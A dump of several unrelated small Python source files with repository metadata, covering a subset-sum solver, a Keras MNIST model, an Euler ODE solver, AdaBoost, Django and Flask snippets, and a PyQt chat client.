eee895aa208bf3cb361fc0fb544a906fefda9cfc
|
289a4edabd6fb7db72a9f0b293046ff828ee1ab6
|
refs/heads/main
| 2023-06-02T05:14:23.927403
| 2021-06-13T18:06:34
| 2021-06-13T18:06:34
| 359,888,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,039
|
py
|
from itertools import combinations
def solution(m, weights):
answer = 0
    for i in range(len(weights) + 1):
combi = combinations(weights, i)
answer += [sum(candies) for candies in combi].count(m)
return answer
def solution2(m, weights):
answer = 0
    for i in range(len(weights) + 1):
results = map(sum, combinations(weights, i))
for result in results:
if result == m:
answer += 1
return answer
# Using bit operators: each weight is either used or not used (two cases per item), so enumerate all 2^n combinations and count the ones that sum to m
def solution3(m, weights):
answer = 0
for stat in range(1, (1 << len(weights))):
now = 0
for i in range(len(weights)):
if stat & 1 << i:
now += weights[i]
if now == m:
answer += 1
return answer
m = 3000
weights = [500, 1500, 2500, 1000, 2000]
# print(solution(m, weights))
print(solution2(m, weights))
# print(solution3(m, weights))
|
[
"DeveloperChoi90@gmail.com"
] |
DeveloperChoi90@gmail.com
|
ee84040faf43259103c17931f9209b1ae40621b6
|
b037e36771bd47cb84a9ce9745ffeac801256b56
|
/hot_info/picrew_info/picrew_info/utils.py
|
95fd1965de6e5a29fe2493be7981d89d4f4b199c
|
[] |
no_license
|
SuperMMORPG/scrapy_project
|
7004714ede620bddf30dd15d8779322959087280
|
ccac1089de94064077444026b3a1f484910d7543
|
refs/heads/main
| 2023-05-15T02:59:24.195936
| 2021-06-09T15:43:03
| 2021-06-09T15:43:03
| 344,821,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
from redis import Redis
import os
import time
from datetime import datetime
def connect():
host = '192.168.1.100'
port = 6379
conn = Redis(host=host,port=port)
return conn
def add(conn,name,url):
    ex = conn.sadd(name,url)
    if ex==1:
        print('** new URL, ok to fetch task', url)
        return True
    else:
        print('## URL already exists', url)
        return False
def create_md(spider):
    # print('starting task...')
fp = None
dir_path = './today_data'
name = spider.name + '_'
filename = name + datetime.today().strftime('%Y%m%d') + '.md'
file_path = os.path.join(dir_path,filename)
fp = open(file_path,'w',encoding='utf-8')
fp.write('---')
fp.write('\n')
fp.write('title: %s'%(spider.name))
fp.write('\n')
ymd_time = time.strftime('%Y-%m-%d ',time.localtime())
fp.write('date: %s'%(ymd_time))
fp.write('\n')
fp.write('tags: scrapy_%s'%(spider.name))
fp.write('\n')
fp.write('categories: news')
fp.write('\n')
fp.write('---')
fp.write('\n')
fp.write('# %s'%(spider.name))
fp.write('\n')
now_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
fp.write('## %s'%(now_time))
fp.write('\n')
fp.write('*****'+'\n')
return fp
|
[
"bad_jin@outlook.com"
] |
bad_jin@outlook.com
|
420bfc1384cc7e64d98a0a50480e91c6a98e4e9c
|
69be6b5974c50eedeba274ee9a8d9a4bfdb48172
|
/code1.py
|
5b225b7e3b4d7a89dd103888f7092e55fe3093ae
|
[] |
no_license
|
Praneeth102/mlops3
|
1b00cef590dbffd372c46db5c0feb128501d8b26
|
4a109ea696cd678ba580b5b0addd5b538ff24442
|
refs/heads/master
| 2022-09-09T16:46:13.283205
| 2020-05-27T17:54:09
| 2020-05-27T17:54:09
| 267,030,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
#importing data from keras
from keras.datasets import mnist
from keras.utils import np_utils
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from keras import backend as K
# Training Parameters
batch_size = 128
epochs =1
# Lets store the number of rows and columns
img_rows =28
img_cols =28
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data('mymnist.data')
# Getting our data in the right 'shape' needed for Keras
# We need to add a 4th dimension to our data, thereby changing
# our original image shape of (60000,28,28) to (60000,28,28,1)
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
# store the shape of a single image
input_shape = (img_rows, img_cols, 1)
# change our image type to float32 data type
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# Normalize our data by changing the range from (0 to 255) to (0 to 1)
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Now we one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
# Let's count the number of columns in our one-hot encoded matrix
print ("Number of Classes: " + str(y_test.shape[1]))
# create model
num_classes=10
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(BatchNormalization())
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss = 'categorical_crossentropy',
optimizer = keras.optimizers.Adadelta(),
metrics = ['accuracy'])
print(model.summary())
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
pran=score[1]
pran
|
[
"praneethkothapally102@gmail.com"
] |
praneethkothapally102@gmail.com
|
c413ca59ce0807612bc27516d70a155bab6ff5c4
|
ce6efac2d0339c08566f684e7ff425e8432c380f
|
/datas.py
|
ea47f8c237f1799b0785f4c1ffc645a1ed2bb48b
|
[] |
no_license
|
agb91/Icebergs
|
728bdaec548968e781ce846dd063356776858ad8
|
938010528003695b96cd47115491decef0a015ec
|
refs/heads/master
| 2022-01-22T15:12:25.557895
| 2019-07-29T10:24:27
| 2019-07-29T10:24:27
| 111,598,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
from import_all import *
class Datas:
    # easy object, just contains some information
def __init__( self, X_train, y_train, X_test ):
self.X_train = X_train
self.y_train = y_train
self.X_test = X_test
|
[
"andrea.damio1991@hotmail.it"
] |
andrea.damio1991@hotmail.it
|
d20a7e91da0fed90cf53eb24e3cd727e85282669
|
632747fbfbf1122497792291cb5a6a9f24add48d
|
/codewars/summation.py
|
41fa1933b4bf4226cf0bc5a1581c76da79881398
|
[] |
no_license
|
mjoze/kurs_python
|
892ac4fab7f3b3fb1d88b236c362a7630a565af7
|
78ec0dda34a5450a4c47d79f3957c65dfbac0276
|
refs/heads/master
| 2020-08-07T10:54:56.198237
| 2020-04-30T15:31:50
| 2020-04-30T15:31:50
| 213,421,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
"""
Summation
Write a program that finds the summation of every number from 1 to num.
The number will always be a positive integer greater than 0.
For example:
summation(2) -> 3
1 + 2
summation(8) -> 36
1 + 2 + 3 + 4 + 5 + 6 + 7 + 8
"""
def summation(num):
sum_numbers = 0
for i in range(1, num + 1):
sum_numbers += i
return sum_numbers
|
[
"mirek.jozefiak@gmail.com"
] |
mirek.jozefiak@gmail.com
|
562c4bebc73931b44bcb49450642a46d9df9ee43
|
851bc00bb6f55159ba9e0f43cd9ab796649099c6
|
/Folien_und_Literaturen/0schon verpasst/Modelle fuer virtuelle Realitaet/ex1/ex1/Christian Henning/explicit_euler.py
|
64d915ef8d59f7da1ec6344ae3ae1bed4024cb2c
|
[] |
no_license
|
JoshuaGhost/lecture_slides
|
67376ac58952f837cf54bebfdacc18b5ec281624
|
3cf78e289d54d2cad63634ff4a36fe7e935fb443
|
refs/heads/master
| 2021-01-20T21:00:58.699150
| 2016-08-22T22:38:42
| 2016-08-22T22:38:42
| 61,571,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,604
|
py
|
#!/usr/bin/python
# author Christian Henning - 2843590
from sympy import *
from sympy.parsing.sympy_parser import parse_expr
import matplotlib.pyplot as plt
import os
import math
import sys
y_cur, y_next, y, x_cur, x_next, x, dx = symbols('y_cur, y_next, y, x_cur, x_next, x, dx')
stabilityTest = 0 # used when probing for A stability
epsilon = 0 # used when probing for A stability (break condition)
if len(sys.argv) <> 6:
#########################
### input values
# step size
dx = 0.01
numberOfSteps = 100
# initial values
x_0 = 0
y_0 = 1
# state the differential equation f(y, x).
# y' = f(y, x)
#derivative = 1 - 2 * y
derivative = y**2
########################
# command line inputs for A stability tester
# exit codes: 0 - test passed
# 1 - invalid input arguments
# 2 - method not strictly monotonic decreasing
# 3 - no A stability test was running or the test did not finish properly (maybe because of the occurrence of a complex number)
else:
try:
dx = float(sys.argv[1])
numberOfSteps = 0 # just to avoid uninitialized variables
x_0 = float(sys.argv[2])
y_0 = float(sys.argv[3])
derivative = parse_expr(sys.argv[4])
epsilon = float(sys.argv[5])
stabilityTest = 1
except:
print 'Error: Invalid input arguments.'
sys.exit(1)
# Note that for the explicit Euler method you have to replace the function y by its current value y_cur
derivative = derivative.subs(x, x_cur)
derivative = derivative.subs(y, y_cur)
# method to write results into csv file
def writeCSVFile(x,y):
# the csv file will have the same name as this script but with the extension '.csv'
fileName, fileExtension = os.path.splitext(os.path.basename(__file__))
csv = open(fileName + '.csv', "w")
for i in range(0,len(x)):
csv.write("%f\t%f\n" % (x[i], y[i]))
csv.close()
# we are considering differential equations like: y' = f(y, x)
eulerMethod = y_cur + dx * derivative
x = list([x_0])
y = list([y_0])
i = 0;
while stabilityTest == 1 or i < numberOfSteps:
i = i+1
x.append(x[i-1] + dx)
tempExpr = eulerMethod.subs(x_cur, x[i-1]);
tempExpr = tempExpr.subs(y_cur, y[i-1]);
try:
# add next value
y.append(float(tempExpr))
except:
print 'Warning: Result seems to be complex. Approximation stopped.'
del x[-1]
break
if stabilityTest == 1:
# function is not strictly monotonic decreasing
if y[i] >= y[i-1]:
sys.exit(2)
if math.fabs(y[i]) < epsilon:
sys.exit(0)
if stabilityTest <> 1:
writeCSVFile(x,y);
# plot the solution
plt.plot(x,y)
plt.xlabel('x')
plt.ylabel('y(x)')
plt.show()
sys.exit(3)
|
[
"joshuaghost@gmail.com"
] |
joshuaghost@gmail.com
|
6706fc44bdc8960ccc269b1cafb7966e6c0245a5
|
eb2b022e95fd310df0c2102d2329a13345534a8a
|
/cart/forms.py
|
00b0673a3412db9fa77e30ba6653a17b1855a39e
|
[] |
no_license
|
Agmella/Ecommerce-website-AP-
|
a86f6ea9a72361cfaa07c9aad1d06bdb56ce66a8
|
c49d4c49243e9abd0967428bc349ad6a0815f5d0
|
refs/heads/master
| 2023-04-28T23:17:16.320421
| 2019-10-24T18:01:41
| 2019-10-24T18:01:41
| 215,369,311
| 0
| 0
| null | 2023-04-21T20:39:10
| 2019-10-15T18:29:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 641
|
py
|
from django import forms
from .models import order
#Quantity = [tuple([x,x]) for x in range(1,32)]
#class CartForm(forms.Form):
# quantity = forms.IntegerField(label='Quantity')
class PaymentInfo(forms.ModelForm):
name = forms.CharField(label='Name', max_length=100)
mobile = forms.CharField(label='Mobile No.', max_length=100)
email = forms.EmailField(label = 'Email ID')
address = forms.CharField(label='Shipping Address', max_length=100)
method = forms.CharField(label='Payment Method' , max_length=100)
class Meta:
model = order
fields = ('name', 'mobile', 'email', 'address', 'method')
|
[
"avneeshgarimella@gmail.com"
] |
avneeshgarimella@gmail.com
|
6adbfbe0c7845c0852f0fff38504793bdcc8bcb7
|
a0041845c05228da96d55a0aa8a06780180df7b2
|
/employee/urls.py
|
d9df0a857fd118cb12bdd65d6f596737faecf7a5
|
[] |
no_license
|
mnosinov/drf_sjlouji_project
|
e2f9a66c7bbf42a937ab76a4839053e9c479d9bd
|
95fa48b12d30dfd47c8ed3ae7d4e8ac7748c02f2
|
refs/heads/master
| 2023-04-06T09:58:59.197792
| 2021-03-26T05:07:39
| 2021-03-26T05:07:39
| 351,310,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
from django.urls import path
from .api import EmployeeCreateAPI, EmployeeAPI, EmployeeUpdateAPI, EmployeeDeleteAPI
urlpatterns = [
path('api', EmployeeAPI.as_view()),
path('api/create', EmployeeCreateAPI.as_view()),
path('api/<int:pk>', EmployeeUpdateAPI.as_view()),
path('api/<int:pk>/delete', EmployeeDeleteAPI.as_view()),
]
|
[
"mnosinov@gmail.com"
] |
mnosinov@gmail.com
|
504441bfe7c528f8656753ca54b4d8e057d221fe
|
778a88f23fe3d44798eb895bbd3a99734f77419b
|
/AdaBoost.py
|
9c457dadbb7ea118c54adae3e10c0f2666969148
|
[] |
no_license
|
KingJames777/Ensemble
|
5e837a0f59a04c8d290414681d9b82fba034d580
|
da8ac3114a184a42fa9e4d9d6042516fbb551483
|
refs/heads/master
| 2020-04-30T14:45:52.825136
| 2019-03-21T08:26:37
| 2019-03-21T08:26:37
| 176,901,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
from sklearn.datasets import load_breast_cancer as lbc
from sklearn.model_selection import train_test_split as tts
from sklearn.metrics import accuracy_score
from numpy import *
from ROC import roc
def cut_value_array(X,points=10):
low,up=X.min(),X.max()
res=zeros(points)
step=(up-low)/points
res[0]=low+step/2
for i in range(1,points):
res[i]=res[i-1]+step
return res
def classifier(X,cut_point,flag):
pred=ones(len(X))
if flag==0:
pred[X<=cut_point]=-1
else:
pred[X>cut_point]=-1
return pred
## outputs the stump's feature index, the corresponding split value, and the error rate
def DecisionStump(X,y,weight,points):
    m,n=X.shape; stump={}; error=inf
    for i in range(n):
        cut_points=cut_value_array(X[:,i],points)
        for j in range(points):
            for flag in [0,1]:
                pred=classifier(X[:,i],cut_points[j],flag)
                temp_error=sum(weight*(pred!=y)) ## don't mistake accuracy for the error rate!
                if temp_error<error:
                    error=temp_error
                    stump['value'],stump['featNum']=cut_points[j],i
                    stump['inequa'],stump['pred']=flag,pred ## don't forget to update these!
    stump['alpha']=0.5*log(1/error-1)
    return stump
def train(X,y,n_estimators,points=10):
    m=shape(X)[0]; weight=ones(m)/m; stumps=[]; error=inf
    while n_estimators>0:
        stump=DecisionStump(X,y,weight,points)
        pred=stump.pop('pred')
        stumps.append(stump)
        temp=exp(-stump['alpha']*y*pred) ## update sample weights
        weight*=temp
        temp=sum(weight)
        weight/=temp
        n_estimators-=1
    return stumps
def predict(X,stumps):
m,n=len(X),len(stumps)
pred=zeros(m)
for i in range(n):
pred+=stumps[i]['alpha']*classifier(X[:,stumps[i]['featNum']],
stumps[i]['value'],stumps[i]['inequa'])
return pred,sign(pred)
if __name__=='__main__':
    Data=lbc(); X=Data.data; y=Data.target; y[y==0]=-1
    X_train, X_test, y_train, y_test=tts(X,y,random_state=1990,test_size=0.2,stratify=y)
    stumps=train(X_train,y_train,50,15) ## the number of feature split points is also a hyperparameter to consider
    prob,pred=predict(X_test,stumps)
    print(accuracy_score(pred,y_test))
    roc(prob,y_test)
|
[
"noreply@github.com"
] |
KingJames777.noreply@github.com
|
34b07997787425ab13acbd59fa8ba3cdb4f23876
|
b501a5eae1018c1c26caa96793c6ee17865ebb2d
|
/data_persistence_and_exchange/csv/csv_reader.py
|
2676d2c1149e1ffb361cfef0b2206a62029b800d
|
[] |
no_license
|
jincurry/standard_Library_Learn
|
12b02f9e86d31ca574bb6863aefc95d63cc558fc
|
6c7197f12747456e0f1f3efd09667682a2d1a567
|
refs/heads/master
| 2022-10-26T07:28:36.545847
| 2018-05-04T12:54:50
| 2018-05-04T12:54:50
| 125,447,397
| 0
| 1
| null | 2022-10-02T17:21:50
| 2018-03-16T01:32:50
|
Python
|
UTF-8
|
Python
| false
| false
| 127
|
py
|
import csv
import sys
with open(sys.argv[1], 'rt') as f:
reader = csv.reader(f)
for row in reader:
print(row)
|
[
"jintao422516@gmail.com"
] |
jintao422516@gmail.com
|
21682bc1c9f6985730eb98b0a543fba2fd37a893
|
8340124261bb2ff02ad4234c7e1f05ca6b8c5071
|
/imylu/linear_model/regression_base.py
|
e598b9e66251e827d74024abed65f9edade94d7d
|
[
"Apache-2.0"
] |
permissive
|
chenxushu1025/imylu
|
db49d71bebc6216efdcdc7c315152ae905f39717
|
984aaa5abe2fe95999b5a84b458acde33b08c2ae
|
refs/heads/master
| 2020-04-11T08:02:02.963860
| 2018-12-03T09:04:08
| 2018-12-03T09:04:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,988
|
py
|
# -*- coding: utf-8 -*-
"""
@Author: tushushu
@Date: 2018-06-27 11:25:30
@Last Modified by: tushushu
@Last Modified time: 2018-06-27 11:25:30
"""
from random import sample, normalvariate
class RegressionBase(object):
def __init__(self):
"""Regression base class.
Attributes:
bias: b
weights: W
alpha: α
"""
self.bias = None
self.weights = None
self.alpha = None
self.fn = None
def _predict(self, Xi):
"""y = WX + b.
Arguments:
Xi {list} -- 1d list object with int or float.
Returns:
float -- y
"""
ret = sum(wi * xij for wi, xij in zip(self.weights, Xi)) + self.bias
return self.fn(ret) if self.fn else ret
def _get_gradient_delta(self, Xi, yi):
"""Calculate the gradient delta of the partial derivative.
Arguments:
Xi {list} -- 1d list object with int.
yi {float}
Returns:
NotImplemented
"""
return NotImplemented
def _batch_gradient_descent(self, X, y, lr, epochs):
"""Update the gradient by the whole dataset.
b = b - learning_rate * 1/m * b_grad_i, b_grad_i <- grad
W = W - learning_rate * 1/m * w_grad_i, w_grad_i <- grad
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
"""
m, n = len(X), len(X[0])
self.bias = 0
self.weights = [normalvariate(0, 0.01) for _ in range(n)]
# Calculate the gradient of each epoch(iteration)
for _ in range(epochs):
bias_grad = 0
weights_grad = [0 for _ in range(n)]
# Calculate and sum the gradient delta of each sample
for i in range(m):
bias_grad_delta, weights_grad_delta = self._get_gradient_delta(
X[i], y[i])
bias_grad += bias_grad_delta
weights_grad = [w_grad + w_grad_d for w_grad, w_grad_d
in zip(weights_grad, weights_grad_delta)]
# Update the bias and weight by gradient of current epoch
self.bias += lr * bias_grad * 2 / m
self.weights = [w + lr * w_grad * 2 / m for w,
w_grad in zip(self.weights, weights_grad)]
def _stochastic_gradient_descent(self, X, y, lr, epochs, sample_rate):
"""Update the gradient by the random sample of dataset.
b = b - learning_rate * b_sample_grad_i, b_sample_grad_i <- sample_grad
W = W - learning_rate * w_sample_grad_i, w_sample_grad_i <- sample_grad
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
sample_rate {float} -- Between 0 and 1.
"""
m, n = len(X), len(X[0])
k = int(m * sample_rate)
self.bias = 0
self.weights = [normalvariate(0, 0.01) for _ in range(n)]
# Calculate the gradient of each epoch(iteration)
for _ in range(epochs):
# Calculate the gradient delta of each sample
for i in sample(range(m), k):
bias_grad, weights_grad = self._get_gradient_delta(X[i], y[i])
# Update the bias and weight by gradient of current sample
self.bias += lr * bias_grad
self.weights = [w + lr * w_grad for w,
w_grad in zip(self.weights, weights_grad)]
def fit(self, X, y, lr, epochs, method="batch", sample_rate=1.0,
alpha=None):
"""Train regression model.
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
Keyword Arguments:
method {str} -- "batch" or "stochastic" (default: {"batch"})
sample_rate {float} -- Between 0 and 1 (default: {1.0})
alpha {float} -- Regularization strength. (default: {None})
"""
if alpha is not None:
self.alpha = alpha
assert method in ("batch", "stochastic")
# batch gradient descent
if method == "batch":
self._batch_gradient_descent(X, y, lr, epochs)
# stochastic gradient descent
if method == "stochastic":
self._stochastic_gradient_descent(X, y, lr, epochs, sample_rate)
def predict(self, X):
"""Get the prediction of y.
Arguments:
X {list} -- 2D list with int or float.
Returns:
NotImplemented
"""
return NotImplemented
|
[
"m18591915960@163.com"
] |
m18591915960@163.com
|
50d4ca37296bab8494a4e4629956dba88dc8a4f7
|
cc79dd3c7095448fb7a0532fb2c3bf2d91aecb22
|
/polls/migrations/0002_auto_20200313_0812.py
|
fb63a09b385122589ad074a2721d72f8ff2afa01
|
[] |
no_license
|
SV96/todo
|
62ae6c993e3c0a1fed3fa366cf75f7161886c517
|
4ab20f798f9a133ee2d28fc100ef5c3d3eceefb3
|
refs/heads/master
| 2021-03-26T07:12:49.266087
| 2020-03-16T11:31:54
| 2020-03-16T11:31:54
| 247,683,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
# Generated by Django 3.0.4 on 2020-03-13 08:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='tods',
name='do_date',
field=models.DateTimeField(auto_now=True),
),
]
|
[
"me.svipul@gmail.com"
] |
me.svipul@gmail.com
|
cfb2bc67a1cc0ce75ffb18cd23e902d26d4590ec
|
292d1a1caedeb603f035e086e1a36a2230a4ede3
|
/messanger.py
|
7bbd19478631eb43747b4db36ac9df6d66371ed7
|
[] |
no_license
|
Phoenix951/Messenger
|
d82a4b1c06f45a34d0eab9067e80d159ba4030d6
|
9a3ca28495bd8ea8e0ce6cf2c84297d3a0091f08
|
refs/heads/master
| 2021-02-08T07:35:18.907661
| 2020-03-01T09:57:46
| 2020-03-01T09:57:46
| 244,124,662
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,964
|
py
|
import requests
import clientui
from PyQt5 import QtWidgets, QtCore
from datetime import datetime
class MessangerWindow(QtWidgets.QMainWindow, clientui.Ui_Messanger):
def __init__(self):
super().__init__()
self.setupUi(self)
self.last_message_time = 0
self.pushButton.pressed.connect(self.sendMessage)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.getUpdates)
self.timer.start(1000)
def sendMessage(self):
username = self.lineEdit.text()
password = self.lineEdit_2.text()
text = self.textEdit.toPlainText()
if not username:
self.addText("ERROR: username is empty.")
return
if not password:
self.addText("ERROR: password is empty.")
return
        if not text:
            self.addText("ERROR: text is empty.")
            return
        response = requests.post(
            "http://127.0.0.1:5000/send",
            json={"username": username, "password": password, "text": text}
        )
        if not response.json()["ok"]:
            self.addText("ERROR: Access denied")
            return
self.textEdit.clear()
self.textEdit.repaint()
def addText(self, text):
self.textBrowser.append(text)
self.textBrowser.repaint()
def getUpdates(self):
response = requests.get(
"http://127.0.0.1:5000/history",
params={"after": self.last_message_time}
)
data = response.json()
for message in data["messages"]:
beuty_time = datetime.fromtimestamp(message["time"])
beuty_time = beuty_time.strftime("%Y/%m/%d %H:%M:%S")
self.addText(beuty_time + " " + message["username"])
self.addText(message["text"])
self.addText("")
self.last_message_time = message["time"]
app = QtWidgets.QApplication([])
window = MessangerWindow()
window.show()
app.exec_()
|
[
"darkcobra31@gmail.com"
] |
darkcobra31@gmail.com
|
27156a26c7bb0efa665f0ef3bba33ed4d7dabada
|
ce972e94fcdf19d6809d94c2a73595233d1f741d
|
/catkin_ws/devel/.private/tf2_ros/lib/python3/dist-packages/tf2_ros/__init__.py
|
69aa0dcd05e50e77d04503ebd2e77f689637d53d
|
[] |
no_license
|
WilliamZipanHe/reward_shaping_ttr
|
cfa0e26579f31837c61af3e09621b4dad7eaaba2
|
df56cc0153147bb067bc3a0eee0e1e4e1044407f
|
refs/heads/master
| 2022-02-23T05:02:00.120626
| 2019-08-07T21:52:50
| 2019-08-07T21:52:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/local-scratch/xlv/catkin_ws/src/geometry2/tf2_ros/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"xlv@cs-mars-01.cmpt.sfu.ca"
] |
xlv@cs-mars-01.cmpt.sfu.ca
|
645d2e4c75fec3b66e9259390978440dbdf224ed
|
3441669466b82df5c357412d9423e174a1e6a9c7
|
/setup.py
|
9104c5c45f5bc47fb9a434c230602f000b5c993a
|
[
"MIT"
] |
permissive
|
icetemple/genrss
|
a725b66dc67ea2785a6ee70229921d45ab57fb30
|
ddc2724684c96b3eaac9820cb82de7ddbcbddda8
|
refs/heads/master
| 2022-10-06T10:55:38.873579
| 2022-09-27T12:26:21
| 2022-09-27T12:26:21
| 198,481,237
| 17
| 1
|
MIT
| 2022-09-27T12:26:22
| 2019-07-23T17:48:39
|
Python
|
UTF-8
|
Python
| false
| false
| 635
|
py
|
from setuptools import setup
with open('README.md', 'r') as f:
readme = f.read()
if __name__ == '__main__':
setup(
name='genrss',
version='1.0.6',
author='Dmitriy Pleshevskiy',
author_email='dmitriy@ideascup.me',
description='RSS feed generator for python',
long_description=readme,
long_description_content_type='text/markdown',
package_data={'': ['LICENSE', 'README.md']},
include_package_data=True,
license='MIT',
packages=['genrss'],
install_requires=[
'lxml>=4.3.4',
'pytz==2019.1'
]
)
|
[
"dmitriy@ideascup.me"
] |
dmitriy@ideascup.me
|
c05b08f80244954da7bfd5b85a371abc60184769
|
723b67f6a8b202dc5bb009427f60ffd9f185dba8
|
/build/ros_arduino_bridge/ros_arduino_msgs/catkin_generated/pkg.installspace.context.pc.py
|
6549f05a69eed882ecc868edef3bb97aa159f598
|
[] |
no_license
|
Dhawgupta/catkin_ws
|
15edced50d3d69bf78851315658646cd671eb911
|
edab645f1a94c83925836b36d38ecf2ad8f42abc
|
refs/heads/master
| 2021-01-19T10:56:09.954495
| 2017-04-11T09:52:20
| 2017-04-11T09:52:20
| 87,917,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 474
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/dawg/catkin_ws/install/include".split(';') if "/home/dawg/catkin_ws/install/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;std_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ros_arduino_msgs"
PROJECT_SPACE_DIR = "/home/dawg/catkin_ws/install"
PROJECT_VERSION = "0.2.0"
|
[
"dhawal.cs15@iitp.ac.in"
] |
dhawal.cs15@iitp.ac.in
|
d8dc0ac5d39f9570627b88d136d4236c42105090
|
169b85e868816faa7b474507c414062e4ffce573
|
/geo/views/user.py
|
570634e67d145f0187e2f263a709b1c4f4a24dfd
|
[
"MIT"
] |
permissive
|
hariharshankar/pygeo
|
c7bfb8cfdbfe94a1f2830dfcf5bd55a79c9dbd1a
|
f87b5f117dd35e8c6491d1c627cc795e416df6f9
|
refs/heads/master
| 2020-12-29T02:31:44.260477
| 2017-10-28T18:36:33
| 2017-10-28T18:36:33
| 17,834,680
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,331
|
py
|
import flask
from geo.core.geo_user import GeoUser
db = None
mod = flask.Blueprint("user", __name__)
@mod.route("/login", endpoint='login', methods=['POST'])
def login():
request = flask.request
session = flask.session
username = request.form['username']
password = request.form['password']
print(username, password)
try:
user = GeoUser(db, username=username)
print(user.firstname)
except AttributeError as e:
print(e)
return flask.jsonify(data={'error': True})
if user.validate_user(password):
session['username'] = username
session['user_fname'] = user.firstname
session['user_lname'] = user.lastname
session['user_id'] = user.user_id
session['moderator_user'] = user.moderator_user
data = {}
data['fullname'] = "%s %s" % (user.firstname, user.lastname)
return flask.jsonify(data=data)
return flask.jsonify(data={'error': True})
@mod.route("/logout", endpoint='logout', methods=['GET'])
def logout():
session = flask.session
session.pop('username', None)
session.pop('user_fname', None)
session.pop('user_lname', None)
session.pop('user_id', None)
session.pop('moderator_user', None)
nex = flask.request.args.get("next", "/")
return flask.redirect(nex)
|
[
"hariharshankar@gmail.com"
] |
hariharshankar@gmail.com
|